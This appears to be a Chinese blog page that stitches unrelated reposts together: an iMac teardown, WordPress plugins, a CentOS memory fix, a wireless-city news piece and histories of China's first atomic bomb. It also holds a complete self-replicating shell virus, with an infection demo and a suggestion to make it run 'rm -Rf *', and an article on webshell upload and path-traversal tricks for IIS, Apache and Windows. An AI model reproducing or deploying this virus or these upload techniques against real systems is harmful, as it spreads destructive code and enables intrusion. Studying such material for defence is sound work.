亮的MARK库

mark.liangliang.org.cn

主板到处存在飞线,质量不良的接口,硬盘固定不牢靠,20个imac其中有一个液晶背光管质量有问题,焊点不均匀,烫手的散热,内部接口松散,用锡纸做衬底防止静电,锡纸遇热是要溶化造成短路的,波音的一次飞机发动机燃烧就是采用锡纸包线溶化短路导致的,虽然苹果的热量到达不了溶化锡纸的地步,但是烫手的外壳这种散热情况下锡纸却成了良好的隔热保温材料。

具体图片不展示了。 上个小视频。

拆了的imac

WordPress必备十大插件 1. Akismet [荐] 插件功能:很有名且强大的防垃圾评论插件,可大量减少甚至彻底消灭垃圾评论和 trackback。即使有漏网之鱼,只需在管理面板将其标记为 “垃圾”,Akismet 便会自动学习,以纠正错误。 插件说明:需要输入 WordPress.com API 序列号 才能使用,如果你没有,可以到 WordPress.com 注册账号以获取。

2. StatPress [荐] 插件功能:对你的博客进行实时统计,可为你的博客提供每日访问人数、页面浏览量、最近访客来源、访客详细情况等等的统计。 插件说明:带Widget,可在前台显示统计情况。另外,你也可以使用 Stats统计插件,但需要使用 WordPress.com API 序列号。 3. Related Posts [荐] 插件功能:通过tag(标签)在文章下显示与次文章相关的日志。 4. ShareThis Classic 插件功能:让你的读者可以方便地将文章收藏到主流的中文网摘,或与他人分享。 插件说明:使用后,在后台的插件页面会有提示需要更新,请不要进行更新,因为更新之后就成了英文版,那里面的网摘很多都是国外的。另外,你也可以使用17fav的收藏分享插件 。17fav的插件比较美观,但其网摘的数量只有八个,而ShareThis插件则有26个网摘,且可以通过E-mail的方式分享。 5. PostViews [荐] 插件功能:可统计并显示每篇文章被阅读的次数。 插件说明:带Widget,可在侧边栏显示热门文章(即阅读次数排在前面的文章)。 6. RecentComments 插件功能:在 WordPress 的侧边栏显示最新评论。你可以限制显示评论的数量,设置评论摘要的最大长度,过滤反链接评论。你还可以显示或屏蔽评论者头像,调整头像的尺寸和位置。除此之外,此插件支持 WordPress Widget。而现在,你可以通过点击分页按钮来查看新旧评论。 插件说明:当评论者已在 Gravatar网站 中设定了头像,则显示设定的头像,如果没有,则显示你在后台所设定的默认显示的头像。 7. Thread Comment [荐] 插件功能:允许用户回复某个特定的评论并集中显示相似评论,可以自由选择是否使用ajax。 8. Ajax Edit Comments 插件功能:可以允许访客、用户在限定的时间内编辑自己的留言,管理者和编辑者可编辑所有的评论。 9. Grins [荐] 插件功能:可让你在编辑文章时及访客发表评论时使用表情。 10. Sticky 插件功能:置顶文章、写公告通知式文章。

所有插件下载地址:http://imsfox.com/wordpress-10-plugins/

说起病毒总有点神秘的味道,想起以前用汇编编写第一个dos病毒时是那么的痛苦 从开始有设想到完成花了3个多月,而且写的也是乱七八糟,最近突发奇想不就是感 染其他文件,传播自己吗,用shell写一个病毒且不是非常简单,于是顺手写了如下 这么一个小脚本,功能就是感染其他shell程序。 这个程序在现实意义不大,但对于形象的理解病毒传播机制还是很很有帮助,可以 算教学意义大于实际意义吧。 SHELL病毒简介 1. 前言 说起病毒总有点神秘的味道,想起以前用汇编编写第一个dos病毒时是那么的痛苦 从开始有设想到完成花了3个多月,而且写的也是乱七八糟,最近突发奇想不就是感 染其他文件,传播自己吗,用shell写一个病毒且不是非常简单,于是顺手写了如下 这么一个小脚本,功能就是感染其他shell程序。 这个程序在现实意义不大,但对于形象的理解病毒传播机制还是很很有帮助,可以 算教学意义大于实际意义吧。 2. 程序代码 #!/bin/sh #文件名: virus_demo.sh #用途 : shell病毒演示。 #说明 : 病毒将感染当前目录下的所有.sh结尾的文件,但不会重复感染。 #编写 : watercloud@xfocus.org

#日期 : 2003-5-13 #B: vFile=$_ ; vTmp=/tmp/.vTmp.$$ for f in ./*.sh; do if [ ! -w $f -a ! -r $vFile ]; then continue; fi if grep ‘’ $f ; then continue; fi if sed -n ‘1p’ $f grep ‘csh’; then continue; fi cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi vNo=`awk ‘$0/(^\b*#)(^\b*$)/&&v==NR-1{v++}END{print 0+v}’ $vTmp` sed -n “1,${vNo}p” $vTmp >$f (sed -n ‘/^#B:/,/^#E:/p’ $vFile ;echo ) >>$f vNo=`expr $vNo + 1` sed -n “${vNo},\$p” $vTmp >>$f rm -f $vTmp done >/dev/null 2>&1 unset vTmp ;unset vFile ;unset vNo echo “Hi, here is a demo shell virus in your script !” #E: #EOF 看shell是多么得强大,这么短短得程序就能感染其他程序文件 3. 演示 测试一下: 先在当前目录放两个文件,一个病毒文件,一个用来作被感染测试用。 [cloud@ /export/home/cloud/vir]> ls -l drwxr-xr-x 2 cloud staff 512 6?? 4 17:43 ./ drwxr-xr-x 10 cloud staff 1024 6?? 4 17:41 ../ -rwxr–r– 1 cloud staff 89 6?? 4 17:43 test.sh -rwxr–r– 1 cloud staff 773 6?? 4 17:42 virus_demo.sh 来看看我们这个”肉鸡”脚本,很简单: [cloud@ /export/home/cloud/vir]> cat test.sh #!/bin/sh # Just a demo for virus test # Author : foo # Date : 3000-1-1 ls -l #EOF 好了开始感染他。 [cloud@ /export/home/cloud/vir]> ./virus_demo.sh Hi, here is a demo shell virus in your script ! 来看看感染后的结果: [cloud@ /export/home/cloud/vir]> cat test.sh #!/bin/sh # Just a demo for virus test # Author : foo # Date : 3000-1-1 #B: vFile=$_ ; vTmp=/tmp/.vTmp.$$ for f in ./*.sh; do if [ ! -w $f -a ! -r $vFile ]; then continue; fi if grep ‘’ $f ; then continue; fi if sed -n ‘1p’ $f grep ‘csh’; then continue; fi cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi vNo=`awk ‘$0/(^\b*#)(^\b*$)/&&v==NR-1{v++}END{print 0+v}’ $vTmp` sed -n “1,${vNo}p” $vTmp >$f (sed -n ‘/^#B:/,/^#E:/p’ $vFile ;echo ) >>$f vNo=`expr $vNo + 1` sed -n “${vNo},\$p” $vTmp >>$f rm -f $vTmp done >/dev/null 2>&1 unset vTmp ;unset vFile ;unset vNo echo “Hi, here is a demo shell virus in your script !” #E: ls -l #EOF 看,病毒体: #B: . . . . #E: 被拷贝过来了,这样病毒就被传播了。值得注意的是病毒体插入的位置是在源test.sh的有效程序行的开始处! 这主要考虑到一般shell程序大家都喜欢在程序开始处作注释说明, 你好歹不能把别人的注释信息给放到后面去,那也太明显了吧。 来执行看看我们新的病毒体看看: [cloud@ /export/home/cloud/vir]> ./test.sh Hi, here is a demo shell virus in your script ! -rwxr-xr-x 1 cloud staff 724 6?? 4 17:44 test.sh -rwxr-xr-x 1 cloud staff 773 6?? 4 17:42 virus_demo.sh 4. 简单讲解 我们来一步步分析一下这个病毒: #B: 病毒体开始标记,用于程序复制自己定位用。 vFile=$_ ; vTmp=/tmp/.vTmp.$$ 定义两个变量,一个临时文件,一个记录当前程序名称$_,这也就要求我们 必须把这行作为程序有效行的第一行,如果放后头我们就无法得到当前程序 名称,后面就找不到从哪里去找病毒体来拷贝了。 for f in ./*.sh; do 开始循环,找到当前目录下的所有.sh结尾的程序。 if [ ! -w $f -a ! -r $vFile ]; then continue; fi 目标是否有写权限,病毒源文件是否有读权限。 if grep ‘’ $f ; then continue; fi 目标是否已经中毒很深无药可救了,如果是这样还给他再来一次也太不仁义了吧? if sed -n ‘1p’ $f grep ‘csh’; then continue; fi 如果目标shell是以csh的那语法上差异太大了,放弃吧。 cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi 好了准备感染,先把目标拷贝一个备份,拷贝失败了怎么办?当然只好放弃了。 vNo=`awk ‘$0~/(^\b*#)(^\b*$)/&&v==NR-1{v++}END{print 0+v}’ $vTmp` 这是干嘛?好像挺复杂,不过学shell病毒不了解awk和正规表达式好像有点说不 过去吧,这个就是找到程序开始的注释和空白行有多少,好方便我们确定病毒体 插入点。 sed -n “1,${vNo}p” $vTmp >$f 一个sed命令把目标文件的开始注释部分从备份文件中copy回来。 (sed -n ‘/^#B:/,/^#E:/p’ $vFile ;echo ) >>$f 再来一个sed完成搬运病毒体的工作。 vNo=`expr $vNo + 1` sed -n “${vNo},\$p” $vTmp >>$f 最后一个sed把目标文件的其他部分搬回来,sed真强大呀!! rm -f $vTmp 清理一下临时文件。 done >/dev/null 2>&1 循环结束。 unset vTmp ;unset vFile ;unset vNo 清理一下犯罪现场。 echo “Hi, here is a demo shell virus in your script !” 都感染了好歹也要显示点东西以告诉别人这是个被病毒感染过的程序吧。 #E: 病毒体结束标记,用于程序复制自己定位用。 5. 后记 从中我们可以看到脚本病毒非常简单,不需要很多知识就能写一个,而且病毒 破坏力也是不可小视比如我们的程序里把echo信息改为rm -Rf * ;同时反方面 也展示了shell的强大之处,试想传统的程序光是处理PE文件结构和ELF结构就得 花多少功夫。 上面得程序已经在Linux和Solaris上测试通过,windows上得用户在Cygwin上 应该也行。 顺便再强调一次,写这篇文章得目的是和大家分享一下对病毒得理解,而不是 教写病毒出去害人,切记切记!

系统特性与web安全
本文作者:SuperHei
文章性质:原创
发布日期:2005-10-18

==============目录=================
一、WINDOWS系统
windows对..\的支持
windows对.的忽略

二、*nix系统
freebsd系统下/的利用
大小写的区分

三,iis与apache
解析文件类型的利用
iis6的特性
apache文件名解析缺陷漏洞

四、配置文件的位置
==================================

一、WINDOWS系统

1、windows对..\的支持

特性:win系统下可以用..\进行跨目录操作
利用:web入侵中进行跨目录操作时,在web程序过滤了/的情况下,我们可以通过..\突破。
实例:MolyX Board的attachment.php中attach变量过虑不严漏洞(http://4ngel.net/article/50.htm)在angel的文章里提供的解决方案里,只过滤了/,并没有对\过滤,导致在win主机上漏洞依旧,详见:http://www.4ngel.net/blog/hei/index.php?action=show&id=92

2、windows对.的忽略

特性:win系统下在文件后缀后的.将被忽略,如test.php. 与test.php是等同的
利用:导致上传文件时,被利用上传webshell
实例:缺

二、*nix系统

1、freebsd系统下/的利用 (ps:也有可能存在于其他系统)

特性:freebsd下因系统文件格式不同导致可以利用/进行目录列片攻击:如在freebsd下运行cat / 得到根目录下的所有文件夹及文件:

cat /

.
.. .snap(
dev\
usr
var stand犅p
etc? cdromg? distsg?
bin? boot唜<
lib \ libexec
mnt ? proc唜?( rescue?? root唜?? sbin唜??
tmp

sys ? .cshrc?? .profile
? COPYRIGHTe?
compat?
home]D? entropy \t service ( d greenarmy玩

利用:mysql注射时可以配合load_file()进行目录列片攻击。如load_file(0x2F) [0x2F为/的hex值] ,load_file(0x2Froot0x2F)

2、大小写的区分

特性:*nix系统是文件格式区分大小写,而windows系统不区分。
利用:最简单的利用也是最直接的 用来区分web服务器使用的系统
实例:分别提交
http://www.4ngel.net/blog/hei/index.php 正常返回
http://www.4ngel.net/blog/hei/inDex.php 提示文件不存在
这个说明www.4ngel.net主机为非windows系统。

三,iis与apache

1、解析文件类型的利用

iis在支持asp外,还支持asa,cer,cdx,htr
apache+php在支持php外,还支持php3,php4,phpx等
由于web程序的过虑不足,导致可以上传webshell

2、iis6的特性

IIS 6.0 目录名里包含有文件.asp会导致其目录下任意文件当做asp文件来运行。如我们把webshell保存到test.asp/webshell.gif,当iis6下访问http://xxx/test.asp/webshell.gif 时webshell.gif被当作asp文件来解析。可以利用到通过数据库备用得到的webshell,存放后门等方面。

3、apache文件名解析缺陷漏洞

apache 文件名解析时,是从后面开始检查后缀,按最后一个合法后缀执行。如:cmdshell.php.heige 因为heige不被apache解析,所以apache把这个文件当php文件解析了.
利用:
a、有的web程序安装后,会把install.php改名为install.php.lock,install.php.bak等等
实例:BMForum等
b、挖掘上传漏洞
实例:Discuz!等
c、…..

四、配置文件的位置

每个系统都自己特定的配置文件(包括第3方软件的配置文件)其位置也是相对固定的。文件内容包含了服务器的敏感信息。在我们利用web漏洞任意操作文件时(如 include包含漏洞,mysql注射load_file()的利用,等等)读取或下载这些配置文件,导致敏感信息的泄露。如:
windows系统:boot.ini mysql的%SYSTEMROOT%/my.ini servu的c:\program files\serv-u\servudeamon.ini 等等
*nix系统的 etc/目录下的文件 等等

小结

本文只是个人的一些经验的整理,由于个人的知识有限,如果有什么不对的或者你有好的发现和经验,等待您的分享!

最近上了新服务器 xeon 5110
主板是MSI 5000v
内存是 1G FBD*1

顺利安装centos 5.0

但是发现 top下 内存显示为3.3g不到点
没有完全识别出4g

查了大量资料后发现

主要需要2个方面设置
1.bios:在bios里开启对大内存的设置
2.安装支持大内存的kernel

centos 5.0 默认安装 for i386的内核不支持 4g+的内存
需要安装上kernel-hugemem
CODE:yum install kernel-hugemem
结果发现 centos 下面 没有 kernel-hugemem这个rpm包了

已经改名为kernel-PAE
尝试用yum安装
CODE:yum install kernel-PAE

安装好后 还需要手工修改 引导
CODE:vi /boot/grub/grub.conf

如果看到如下代码 代表PAE内核已经安装好了
title CentOS (2.6.18-8.1.4.el5PAE)
        root (hd0,0)
        kernel /vmlinuz-2.6.18-8.1.4.el5PAE ro root=LABEL=/
        initrd /initrd-2.6.18-8.1.4.el5PAE.img
修改设置为默认启动
CODE:default=0

init 6
重启服务器
再执行top 内存已经是4.1g了

以上全部在centos 5.0系统下执行
希望以后碰到同样问题的朋友们能注意,我也遇到同样的问题,正好再网上找到这篇文章,借花献佛。

   北京“无线城市”项目运营商于27日宣布,其所承建的一期网络启动试运行,即日起至奥运期间,对公众免费开放。

红色部分为无线网覆盖区域

  “北京无线城市”项目一期工程信号覆盖开通范围包括二环、三环、CBD商圈、金融街、中关村地区及望京经济技术开发区、宣武椿树、亦庄地区等,覆盖面积共100平方公里。从今日起,北京市民在一期覆盖区域内可以通过笔记本电脑、PDA等支持WiFi功能的电子产品在覆盖区室外无线上网。重点服务奥运的北京无线城市一期工程,将为北京奥运会提供奥运信息服务、公共安全服务等多方面的应用。在一期覆盖范围内,在奥运期间,广大市民与奥运观光客人可以随时、随地、随身地享受到免费的无线宽带上网服务,可将视频图像等快速传递给全国乃至全世界的亲朋好友,与他们分享奥运期间的丰富体验。
  然而,新闻给人们带来兴奋的同时,也让大家陷入了思考。
  第一,性能方面。无线网络是利用无线电波作为信息传输的媒介,这些电波通过无线发射装置进行发射,建筑物、车辆、树木和其它障碍物都可能阻碍电磁波的传输,传播的距离越远,信号的自然削减就越多。这就很容易造成大家熟知的“掉线”现象。对于时效性强的工作或者活动,应该慎重使用。另外,理论上无线网络的最大传输速率为54Mbit/s,但实际只能达到20 Mbit/s,只适合于个人终端和小规模网络应用。
  第二,人们最为关注的、也是受质疑最多的一点——信息安全性。原则上,无线网络比有线网络更容易受到入侵,因为被攻击端的电脑与攻击端的电脑并不需要网线设备上的连接,其无线电波根本不需要物理的连接通道,信号是发散的,只要他和你在同一无线路由器或中继器的有效范围内,就可以进入你的内部网络,该网络中所有是传输的数据对他来说都是透明的。如果这些数据都没经过加密的话,黑客就可以通过一些数据包嗅探工具来抓包、分析并窥探到其中的隐私。此外,无线网络就其发展的历史来讲,远不如有线网络长,其安全理论和解决方案远不够完善。
  显然,尽管无线技术有很多优点,但其安全性永远也无法和有线网络的安全性相提并论,除非部署了端到端的加密技术,否则都无法保障无线网络所谓的真正的安全通信。
  通常意义上,计算机安全防护是指防火墙、杀毒软件、及安全卫士360之类的软件等外围保护,实际上还有针对计算机核心内容的深层保护——加密。外围保护会有因没有启动、没有更新等原因而造成“失守”的情况,还有被某些技术手段突破攻击的情况,但是对核心内容的加密保护,则恰恰相反——在加解密程序没有启动的时候信息是加密的、安全的,只有程序启动后它才进入可操作状态。
  外围加上核心内容的保护措施综合起来使用,才能筑起强有效的数据信息安全堡垒。目前,基于PKI技术的加密是全球公认的最科学、最可靠的加密方式,也是电子商务的关键和基础技术。市面上,『大狼狗加密系列产品』可算典例——它不仅针对储存在计算机内部的数据进行加密,还可安装在邮件客户端对实时交互的邮件进行端到端的信息加密,完全摆脱了利用传统数字证书加密的操作冗繁、证书不易管理、终端配置需要专业知识等弊端,有效防止了电子邮件被泄漏、被监听、被篡改等,具有真正完全的安全性。
  国内最大的信息安全厂商吉大正元,其IPC产品部负责人陈宁受访时说“企业、部所、机构等对无线接入服务的需要越来越大,这是目前对先进的信息安全服务需求的驱动因素之一。要知道,针对网络系统安全的技术始终与破坏网络系统安全的技术发展保持同步,无线网络中的数据安全性更需要关注,使用以PKI为核心的技术,将数据加密后存储和传输能够从根本上确保数据的安全,只有采取了必要和恰当的技术手段才能充分提高无线接入的可用性和可推广性。”

中国第一颗原子弹

1.我国的“02”工程

   为了粉碎超级大国的核讹诈和核威协、为了国家安全,我国于1955年毅然决定建立核工业、研制核武器。经过不到十年时间的艰苦努力,终于在1964年10月16日成功地爆炸了第一颗原子弹。又经过二年另8个月,在1967年6月17日成功地进行了氢弹试验。这一伟大成就震惊了全世界。

   五十年代初期,继美国之后,前苏联、英国也相继掌握了原子弹。美苏两国之间展开了一场前所未有的核军备竞赛。核武器成为大国发展战略的重点,成为世界力量平衡的砝码,成为政治、外交、军事斗争的工具,成为决定世界战争与和平的重大因素。朝鲜战争、印度支那战争和台湾海峡事件,都促使我们下决心要建立本国战略力量。毛泽东同志对核武器与核战争问题作了辩证的分析,他指出“大国新世界大战的可能性是有的,只是因为多了几颗原子弹,大家都不敢下手”。还说“原子弹,你有了,我有了,可能谁也不用,这样核战争就打不起来,和平也就更有把握了”。正是为了打破超级大国的核讹诈和核垄断,防止核战争和保卫世界和平,以及我国自身的生存与发展,我国也应研制和掌握核武器。

   1955年1月15日,毛泽东主席主持召开了专门研究发展我国原子能事业的中共中央书记处扩大会议。会上讨论了实施核武器计划的必要性与可能性。最后毛主席高兴地宣布:“为了增强军事实力,中国将立即投入大量人力物力,开展原子能研究”。会议通过了代号为“02”的核武器计划,作出了在我国建立核工业、研制核武器的战略决策.随后,政治局指定领导小组,负责核计划的决策。1956年11月16日国务院正式建立了第三机械工业部,主管核工业建设与发展。从此,核工业与核计划自成系统。1958年2月三机部改组为第二机械工业部,后来又改称为核工业部,现为核工业集团公司。1962年,由于当时各种复杂情况,为了加强各国防机构之间的协调与合作,于11月建立了以周恩来总理为首的中央专门委员会。这个新机构具有很大权力,这个强有力机构,保证了核计划的实施。

2.铀的挑战

   为了制造原子弹,首要任务是找铀矿,然后是开采与加工,最后还要浓缩铀-235。但是在1955年作出制造原子弹决策时,我国还未发现任何铀的“成矿区”。为此,国务院成立了地质部三局,主持全国的铀勘探工作。经过一段艰苦的工作,陆续找到了20多个铀矿。主要分布在湖南、江西、广东等地。以后又选出7个矿进行开采,为我国早期的核爆炸提供了大量的铀矿石。

   有了铀的矿石,还需经过一系列复杂的加工处理和冶炼过程。首先应将铀矿石精选,制成“黄饼”(一种未加工的铀化物),然后冶炼成氧化铀,再转化成四氟化铀,最后再制成六氟化铀。因为六氟化铀沸点低,可制成气体,供气体扩散法浓缩铀工厂使用,制成原子弹燃料。由于我国铀矿的品位低,精选制成“黄饼’后铀的平均含量也只有66%,而且很不纯,这就给冶炼造成很大困难。1958年二机部在北京通县建立了铀矿选冶研究所,于1960年生产出了2377公斤的氧化铀,并利用这些氧化铀生产出了四氟化铀。在通县研究所经验基础上,我国建设了大规模生产氧化铀和四氟化铀的工厂。1963年生产出了合格的氧化铀,并投入规模生产。接着在包头又建了生产四氟化铀的厂。经过三年多的努力,于1963年生产出了十几吨六氟化铀,向兰州气体扩散工厂提供了宝贵的燃料。

3.核燃料生产

   制造原子弹的关键是获得裂变燃料。作为核爆炸的燃料是高浓缩度的铀-235或人造的钚-239。因此制造原子弹有两条途径:第一条途径是从六氟化铀、采用气体扩散法生产高浓缩铀,铀-235的浓度必须达到90%以上,这需要很高的技术;第二条途径是用二氧比铀(天然的或低浓缩度的,约3%〉建立反应堆,生产钚-239,这需要用化学方法,将反应堆产物中的钚分离出来。它也需要很高的生产水平。比较而言,制取钚要比制取高浓缩铀容易一些,但在原子弹设计制造上,钚弹比铀弹难度大些。在初期,我们没经验,所以是两条途径并进。在甘肃兰州建气体扩散工厂生产浓缩铀,在甘肃酒泉建钚生产堆和钚后处理厂。建这些大型设施,要耗巨资,当时我们以很高的代价和附加条件,从前苏联引进这两条生产线的设备。

(1)兴建钚生产堆

钚-239是靠每次铀-235裂变产生的中子(约2.5个),扣除1个中子维持链式反应外,余下的中子被铀-238吸收,形成铀-239,然后又经过两次自发衰变而成为钚-239。所以生产钚-239就是要建造钚生产堆。

当时选择在酒泉地区肃北蒙古自治县附近的祁连山下一片鲜为人知的荒原上,建立了一个原子能联合企业。生产钚的生产线由反应堆、化学分离厂、钚处理厂(精炼用于制造武器的钚)三个主要环节构成。我国第一座石墨慢化轻水钚生产堆于1960年2月破土动工。钚生产堆的建设曾一度下马。在第一颗原子弹爆炸之后,由于后续氢弹开发计划需要用钚,到1967年初,生产钚的反应堆才开始正式运行。1968年12月27日进行的第八次核试验(热核装置)用钚-239作裂变核燃料。值得自豪的是,酒泉钚生产堆的建设,主要是依靠自己的力量和技术完成的。当年风沙蔽日、野兔山羊成群出没的荒原,现在已改造成一片绿洲,成为我国战略武器重要的生产基地。

(2)浓缩铀生产

天然铀中铀-235只含有0.7%,而原子弹的核燃料需要铀-235浓缩度在90%以上。因此需要提高铀-235对铀-238的比值,或者说提高铀-235的浓度。已知可以通过物理的方法��气体扩散法来提高铀-235浓度。分离铀-235和铀�238,是根据它们之间质量的差别来进行的。但由于它们之间的质量差别甚微,即使在理想情况下,经一次扩散,浓缩度也只提高千分之四,实际效果比这个数值还要低一些。因此要获得铀�235浓缩度90%以上核燃料,需要通过几千级的扩散过程。另外,技术上的关键是“多孔扩散膜”的制造,而且在几千级扩散过程中最令人头痛的是腐蚀性和堵塞问题。

在1960年4月,中央做出集中力量建设兰州生产浓缩铀气体扩散工厂的决定。在建设兰州气体扩散厂的同时,又在北京401所设立了气体扩散实验室,进行气体扩散法及多孔扩散膜的研究。以后又指定天津的理化研究院继续从事气体扩散技术的研究。1961年底,兰州气体扩散工厂的基建、安装工作基本完成。又经过一年多的努力,兰州厂的技术人员掌握了分离同位素铀-235的关键技术。经过试验、调试和修改,最后完成了全部生产系统的操作程序。这时401所及时送来了十余吨六氟化铀,于是气体扩散机启动,1964年l月14日完成了浓缩铀的目标,生产出90%浓缩度的铀�235。

原子弹的试验需要特殊的试验场。核试验是检验原子弹理论设计并改进性能必不可少的手段。因此发展战略武器就需要核试验场并进行必要的核试验。

(1)神秘的罗布泊核试验基地

鉴于核武器强大的爆炸威力和强放射性,因此必须寻找合适的核试验基地。1958年8月10日,一列火车满载着经过精心挑选的千余名解放军官兵向西北进发,任务是为核试验基地选一块地方,并去建造它。通过沿途勘察,并配合航空测量,最后确定了新疆罗布泊为核试验基地,整个试验区面积为10万多平方公里,相当于我国浙江省大小。1959年10月16日罗布泊核试验基地正式选定。接着调兵遣将,开展大规模的基地建设,包括铁路、公路、机场、指挥中心、通讯中心、控制中心、试验场(地爆、近地爆、空爆、平洞、竖井等)、实验室、工厂、各种生活设施等。现在基地建设已趋完善,基地首府马兰己建成一片绿洲。

(2)最后准备

原子弹在酒泉组装完成,要运送到新疆罗布泊基地现场。为了安全起见,原子弹分拆成两部分,非核的部件由铁路专列运送,核部件由飞机运送,以确保运输中万无一失。这趟特别列车1964年8月底离开酒泉总装厂。经过精心安排,漫长的铁路运输,非核装置安全地运抵试验基地。几天后,飞机运送原子弹的核芯体。途中随时用监测仪器测量宇宙射线剂量,以防意外事件引发核装置过早发生链式反应。核芯体安全到达核试验基地后,卷扬机将原子弹升到120米高的供核试验的大铁塔顶,其周围装备了各种探测仪器、安置了各种试验用的动物、军事装备等。1964年10月16日15点是中央确定的爆炸零时。

(3)成功的核爆炸

起爆的代号“投篮”的密令于15日发出。从酒泉运来的原子弹全部部件在试验场的地下装配车间里进行完美无缺地装配,并将核弹体小心地用卷扬机安装在120米高的塔顶上。作了最后一次检查后,迅速地撤离到离试验塔23公里的试验控制室内,通过倒记秒,到爆炸零时发出了“起爆’命令。紧张激动的时刻到了,蘑菇云升起了!经过近10年的努力,我国第一颗原子弹爆炸成功了!

当天下午4点,在人民大会堂周总接见“东方红”大型歌舞演出人员时,宣布了原子弹爆炸成功的喜讯。当天晚上中央广播电台向全世界播送了这一消息。我国第一颗原子弹试验成功震惊了全世界。最初西方新闻媒介的反映是“中国原子反应堆己运转多年,依此积累一颗原子弹所需要的钚-239,并非难事”,但当国外分析出我们是用铀�235作核燃料后,他们大感惊讶,才意识到中国已掌握了制造原子弹的最关键技术,即铀同位素分离技术,核燃料已经可以从气体扩散工厂进行工业化生产,而且还掌握了先进的向心聚爆技术。把原先为钚弹而开发的技术,用于浓缩铀弹,这是一项惊人的成就。

人们惊呼,在一个工业、科学资源有限的贫穷落后的国家,用不到十年的时间,能取得如此复杂的技术经济成就。而且更令人吃惊的是,这一成就是在“大跃进”的严重动乱和“三年经济困难时期”实现的。我们靠的是“两弹一星”的精神,靠的是全民族的艰苦努力和共同奋斗。我国有20个部(院)、20个省市自治区的900多家工厂、科研机构、大专院校参加了第一颗原子弹的制造、试验。参予的人数达数十万人。

从铀勘探到制造出第一颗原子弹,按1957年的价格计,约107亿元人民币。我们知道,1957年全国财政总支出才290亿元,107亿元相当于1957年国家预算的37%。虽然核武器研制计划的开支是1955-l964十年间支出的,但这样大数额的拨款是与六十年代初的经济困难状况极不相称的。这就是“勒紧了裤腰带”终获成功。

  1958年7月31日至8月3日,苏联领导人赫鲁晓夫和国防部长马利诺夫斯基秘密访问了北京。中国提出,请苏联“老大哥”传授核技术。然而,从上世纪60年代初开始,两国关系逐渐紧张进而演变为公开对抗。1964年10月16日,中国依靠自己的力量成功地试爆了第一颗原子弹。俄罗斯汉学家通过查阅大量从未公开过的文献,揭开了当年中苏领导人之间鲜为人知的内幕。

  紧锣密鼓作铺垫

  早在1949年春,即中华人民共和国正式成立半年前,中共领导人就派物理学家钱三强前往欧洲参加和平大会。他此行的目的就是为了筹集建立现代物理研究所所必需的资料和设备。在法国科学家弗雷德里克·约里奥·居里的帮助下,这一目的达到了。

  1950年初,中国科学院成立了近代物理研究所(后改名为原子能研究所,art出生的地方)。1953年春,中科院代表团一行人赴苏进修核技术,但他们只接触到了几名丝毫不了解核技术课题的一般科研人员。

  1954年10月,在赫鲁晓夫访华期间,毛泽东第一次提出请苏联帮助中国制造核武器。赫鲁晓夫没有做出任何承诺,并劝说毛泽东放弃这一“不切实际”的计划,认为中国不具备相应的工业基础和经济实力。但是,从1955年到1958年间,双方还是签署了几项相关的协议。

  1955年1月22日签署的协议规定,双方共同在新疆进行地质勘探,并开采铀矿。作为回报,中国政府有义务向苏联提供剩余的铀。勘探发现,中国蕴藏着丰富的制造原子弹的原料,其中西北地区的储量首屈一指。

  1956年4月7日签署的关于帮助中国建设军事和民用设施的苏中协议规定,将铺设从阿克斗卡至兰州的铁路,以便向设在罗布泊的第一座核武器实验中心运送设备。

  毛泽东善用时机

  从1956年到1967年的12年间,中国的科学精英们在核武器的研制上刻苦钻研,来自苏联的640名科学家也参与其中。主要研究内容包括:原子能的和平利用、放射技术、半导体技术、计算机开发以及“国防方面的专门问题”。为了促进这些宏伟计划的实现,中国政府“请求苏联以及其他人民民主国家在这些方面予以多方支持”。

  在中国向苏联政府所提的请求中,摆在首位的是帮助发展国防和原子能工业。1956年初,中共中央委员会决定将火箭和原子能研究作为主要军事计划。从已有文献判断,赫鲁晓夫在1954年至1957年间只同意与中国在用于和平目的的原子能领域里发展合作,这对中国来说远远不够。

  负责中国核计划的聂荣臻元帅回忆道,1956年波兰和匈牙利事件发生后,赫鲁晓夫“在向中国提供复杂的技术帮助方面再让了一步”。1957年9月,中国代表团赴莫斯科谈判。赫鲁晓夫刚刚在党内派别交锋中战胜莫洛托夫及其拥护者。他十分希望毛泽东亲自出席那年在莫斯科举行的共产党和工人党会议,以此间接表明对自己的支持。毛泽东审时度势,提出只有签订了向中国转让生产核武器及其运载工具的材料和模型的军事技术协议后,他才前往莫斯科。

  有关协议于1957年10月15日签署。苏联同意提供原子弹教学模型、图纸及文件,但拒绝提供制造核潜艇的材料。1958年上半年,负责转让原子弹模型及相关生产技术的苏联专家开始陆续来到中国。根据中方资料,莫斯科还提供了两枚地对地近距离导弹模型。到1958年中期,中国的工程师们已经为原子弹爆炸准备好了模拟实验室,苏联专家却几次以安全系数低为由推迟实验。

  苏联领导人毫不怀疑毛泽东准备爆炸原子弹的决心。苏联科学院院士阿布拉姆·约费回忆道:“上面下达的指示是,向中国提供苏联新制订的最完备方案。而参与此项任务的专家们比自己的上级更了解政治局势,仅仅提供了旧方案。但苏联原子弹事务驻华代表处顾问扎季基扬发现了这一点,并向上作了汇报。最终还是提供了最完备的技术,但此后不久苏联同中国的关系就决裂了。”

  中苏原子能合作在1958年6月达到了高潮。当时,中科院原子能研究所在苏联协助下建立的第一座实验重水型核反应堆投入使用。

  一定要造原子弹

  1959年夏天,形势已经清楚,苏联将不向中国提供制造原子弹的全面技术。周恩来说,我们自己造,从零开始,用8年时间造出来。但是,由于大跃进和政治运动,中国的原子弹计划严重受阻。

  1960年,苏联召回1292名专家,更使中国雪上加霜。制造核武器的期限被推迟。1961年7月,中国举行了一次军工企业工作者会议,与会者激烈地讨论着:在经济困难的条件下,是否应当继续研制原子弹和运载工具?

  毛泽东没有出席会议,但要求再次讨论一个问题:中国应当走什么道路?在召开第二次会议的时候,中国已经拥有短程火箭,并掌握了先进军事设备的制造技术,其中包括试验原子弹所需要的设备。中国人因此得出结论:中国也能够独立造出原子弹。外交部长陈毅说,我们即使没有裤子穿,也要拥有世界水平的武器。

  1962年8月,聂荣臻向中国领导人报告,1965年以前就可以试验原子弹。

  北京时间1964年10月16日13时,中国成功试爆了第一颗原子弹。

